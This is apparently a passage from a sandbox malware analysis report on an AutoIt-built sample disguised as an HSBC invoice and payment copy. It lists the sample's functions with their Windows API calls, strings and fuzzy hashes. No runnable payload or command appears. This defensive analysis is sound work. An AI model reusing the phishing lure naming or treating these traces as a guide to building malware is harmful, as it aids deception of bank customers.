                    • SetTextColor.GDI32(?,?), ref: 00F0AD54
                    • SetBkColor.GDI32(?,?), ref: 00F0AD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 35fe68068a712e87ae50f50d3a45500e85a69a810d6705c75983084ab57d286f
                    • Instruction ID: 34b303649f8572aeffba43643b59e7ae6818e60c33d09b0474452c240be5fc1d
                    • Opcode Fuzzy Hash: 35fe68068a712e87ae50f50d3a45500e85a69a810d6705c75983084ab57d286f
                    • Instruction Fuzzy Hash: 6F614D71D00218EFDF219FA4DC48EAE7BB9FB08320F158125F915AB2E1D6759D40EB90
                    Function 00F08C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F08D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08D45
                    • CharNextW.USER32(0000014E), ref: 00F08D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F08DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F08DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F08DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00F08E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F08E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F08E8C
                    • _memset.LIBCMT ref: 00F08EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F08EFA
                    • _memset.LIBCMT ref: 00F08F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F08F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F08FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F09088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F090AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F090F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F09121
                    • DrawMenuBar.USER32(?), ref: 00F09130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00F09158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: e2f7f5cd26a379cd6894a8c104a2391a5df33db6093affa55eb90f49881a3dac
                    • Instruction ID: 4c7ae112bcca969d9433e2dada842e012e7c4f14e3cabc5fa928c991c0e591b4
                    • Opcode Fuzzy Hash: e2f7f5cd26a379cd6894a8c104a2391a5df33db6093affa55eb90f49881a3dac
                    • Instruction Fuzzy Hash: 45E19071901209ABDF209F60CC84EEE7BB9FF05760F108159F955AA2D1DB709A86FF60
                    Function 00F04B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00F04C51
                    • GetDesktopWindow.USER32 ref: 00F04C66
                    • GetWindowRect.USER32(00000000), ref: 00F04C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F04CCF
                    • DestroyWindow.USER32(?), ref: 00F04CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F04D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F04D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F04D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F04D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F04D90
                    • IsWindowVisible.USER32(?), ref: 00F04DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F04DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F04DDF
                    • GetWindowRect.USER32(?,?), ref: 00F04DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F04E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F04E37
                    • CopyRect.USER32(?,?), ref: 00F04E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F04EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                    • Instruction ID: 5bd5b3ee407792f1075ccaff9007a29efa8732f1bf09c819b8d2fc8ce9ddde79
                    • Opcode Fuzzy Hash: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                    • Instruction Fuzzy Hash: 7CB18FB1A04340AFDB14DF64C845B6ABBE4FF84710F04891CF599AB2A1D771EC05EB55
                    Function 00E827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828BC
                    • GetSystemMetrics.USER32(00000007), ref: 00E828C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828EF
                    • GetSystemMetrics.USER32(00000008), ref: 00E828F7
                    • GetSystemMetrics.USER32(00000004), ref: 00E8291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E82939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E82949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E82990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00E829AE
                    • GetStockObject.GDI32(00000011), ref: 00E829CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E829D5
                      • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                      • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    • SetTimer.USER32(00000000,00000000,00000028,00E81256), ref: 00E829FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 68d4d5aa246f8c7b4ca7d8c27c9c4a61f9c888a36e5c92c4eae5367582744c11
                    • Instruction ID: 6a9f63ee3f401661a406faf7b773db282d56314721f80ac0e336bc9d9d852fb3
                    • Opcode Fuzzy Hash: 68d4d5aa246f8c7b4ca7d8c27c9c4a61f9c888a36e5c92c4eae5367582744c11
                    • Instruction Fuzzy Hash: 6EB15E75A0020AAFDB14EFA8DC45BEE7BB4FB08714F109229FA19E7290DB749841DB51
                    Function 00EE46D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscat$D51560_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 3427191167-1459072770
                    • Opcode ID: 559860849919a6740c25b17b1595f75e7ea8e278fae1bd41ac6080a0e28d075d
                    • Instruction ID: b812f9c653c417cddab8c1c3d130214c047ec9b1330bd73d42be53549800c435
                    • Opcode Fuzzy Hash: 559860849919a6740c25b17b1595f75e7ea8e278fae1bd41ac6080a0e28d075d
                    • Instruction Fuzzy Hash: A8412B76A00244BADB14A7758C43EBF77ECDF4A750F00106AF904FA1C2EB75E901A6B6
                    Function 00F04069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00F040F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F041B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 774db0005947e6ea3fb68c73b96d617af0924dfa335929a4cb6e8a06a8ab0441
                    • Instruction ID: 9adc3119abac3979e25d2f8cf0b9333bc2b1f5c1a1d0ec74e2d0955723bafaca
                    • Opcode Fuzzy Hash: 774db0005947e6ea3fb68c73b96d617af0924dfa335929a4cb6e8a06a8ab0441
                    • Instruction Fuzzy Hash: 8CA180B16142019FCB14EF10C991A6AB3E5BF88324F145969B99A6B3D3DB30FC05EB51
                    Function 00EF52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00EF5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00EF5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EF531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00EF532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00EF5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00EF5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00EF534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00EF5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00EF5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00EF536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00EF5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00EF5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00EF538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00EF5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00EF53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00EF53AE
                    • GetCursorInfo.USER32(?), ref: 00EF53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 00EF53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                    • Instruction ID: 6005bdd4da8ca8ac5bc1ae0995f17a4f1d651a93e058ad20e7249da3e5092423
                    • Opcode Fuzzy Hash: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                    • Instruction Fuzzy Hash: 5B418470E043196ADB109FBA8C4986FFFF8EF51B10B10452FE619E7291DAB8A401CE91
                    Function 00EDAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00EDAAA5
                    • __swprintf.LIBCMT ref: 00EDAB46
                    • _wcscmp.LIBCMT ref: 00EDAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EDABAE
                    • _wcscmp.LIBCMT ref: 00EDABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00EDAC21
                    • GetDlgCtrlID.USER32(?), ref: 00EDAC73
                    • GetWindowRect.USER32(?,?), ref: 00EDACA9
                    • GetParent.USER32(?), ref: 00EDACC7
                    • ScreenToClient.USER32(00000000), ref: 00EDACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00EDAD48
                    • _wcscmp.LIBCMT ref: 00EDAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00EDAD82
                    • _wcscmp.LIBCMT ref: 00EDAD96
                      • Part of subcall function 00EA386C: _iswctype.LIBCMT ref: 00EA3874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                    • Instruction ID: c37684a7228acb7e12b84fab2865951556d80272819cf3b007bdb0a513febb96
                    • Opcode Fuzzy Hash: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                    • Instruction Fuzzy Hash: D4A1C771204706AFD714DF24C884BAAF7E9FF04319F14563AF999E2690D730EA46CB92
                    Function 00EDB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00EDB3DB
                    • _wcscmp.LIBCMT ref: 00EDB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EDB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 00EDB431
                    • _wcscmp.LIBCMT ref: 00EDB44F
                    • _wcsstr.LIBCMT ref: 00EDB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB498
                    • _wcscmp.LIBCMT ref: 00EDB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EDB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB518
                    • _wcscmp.LIBCMT ref: 00EDB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00EDB550
                    • GetWindowRect.USER32(00000004,?), ref: 00EDB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                    • Instruction ID: 1b8de81ea86ec591ced5250f36d63bddf1350f03728a51a4034ef383cefbd90f
                    • Opcode Fuzzy Hash: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                    • Instruction Fuzzy Hash: D581B471004305DBDB14DF10D885FAA77E8FF44718F04A56AFD99AA292EB30ED4ACB61
                    Function 00EDB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 6493cfbf65846084ac551f18c058f954eef59324856bfeae113255028a9c2239
                    • Instruction ID: 78239584fed8d34b7307a50510fbb3944f0a21ea641191aa128e6ff0905c8f8c
                    • Opcode Fuzzy Hash: 6493cfbf65846084ac551f18c058f954eef59324856bfeae113255028a9c2239
                    • Instruction Fuzzy Hash: 2E31A332948205E6DB14FA60CD83EEE77E4DF25760F61202AB449711E1FFE1EE05D652
                    Function 00EDC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00EDC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EDC4E6
                    • SetWindowTextW.USER32(?,?), ref: 00EDC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 00EDC512
                    • SetWindowTextW.USER32(00000000,?), ref: 00EDC518
                    • GetDlgItem.USER32(?,000003E9), ref: 00EDC528
                    • SetWindowTextW.USER32(00000000,?), ref: 00EDC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EDC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EDC569
                    • GetWindowRect.USER32(?,?), ref: 00EDC572
                    • SetWindowTextW.USER32(?,?), ref: 00EDC5DD
                    • GetDesktopWindow.USER32 ref: 00EDC5E3
                    • GetWindowRect.USER32(00000000), ref: 00EDC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EDC636
                    • GetClientRect.USER32(?,?), ref: 00EDC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EDC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EDC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                    • Instruction ID: 48f46d556188a2b51357f8cd7482f06f4a2cbe1f249dbcad4aeb7cf4c79fff1e
                    • Opcode Fuzzy Hash: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                    • Instruction Fuzzy Hash: 04518E3090070AAFDB20DFA8DD85B6EBBF5FF04745F104929E686A26A0C775F945DB40
                    Function 00F0A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00F0A4C8
                    • DestroyWindow.USER32(?,?), ref: 00F0A542
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F0A5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F0A5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A5F1
                    • DestroyWindow.USER32(00000000), ref: 00F0A613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E80000,00000000), ref: 00F0A64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A663
                    • GetDesktopWindow.USER32 ref: 00F0A67C
